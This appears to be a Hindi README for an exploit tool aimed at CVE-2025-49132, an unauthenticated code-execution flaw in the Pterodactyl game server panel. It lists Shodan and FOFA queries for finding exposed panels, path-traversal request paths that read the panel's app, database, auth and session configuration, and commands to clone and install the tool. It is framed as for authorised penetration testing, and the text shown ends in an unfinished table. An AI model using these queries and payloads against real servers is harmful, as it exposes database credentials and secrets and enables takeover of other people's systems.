
CVE-2025-49132 के लिए शोषण उपकरण, Pterodactyl गेम सर्वर पैनल में एक महत्वपूर्ण बिना प्रमाणीकरण के RCE। इसमें अधिकृत प्रवेश परीक्षण के लिए जांच क्वेरी और पेलोड शामिल हैं।
CVE-2025-49132 के लिए शोषण उपकरण — Pterodactyl गेम सर्वर पैनल को प्रभावित करने वाली एक गंभीर बिना प्रमाणीकरण के मनमाना कोड निष्पादन भेद्यता।
Pterodactyl पैनल में एक गंभीर ACE दोष जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देता है — संभावित रूप से पूर्ण सिस्टम समझौता की ओर ले जाता है।
कोई प्रमाणीकरण आवश्यक नहीं। बस एक कमजोर इंस्टेंस।
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| सॉफ्टवेयर | स्थिति |
|---|---|
| Pterodactyl Panel |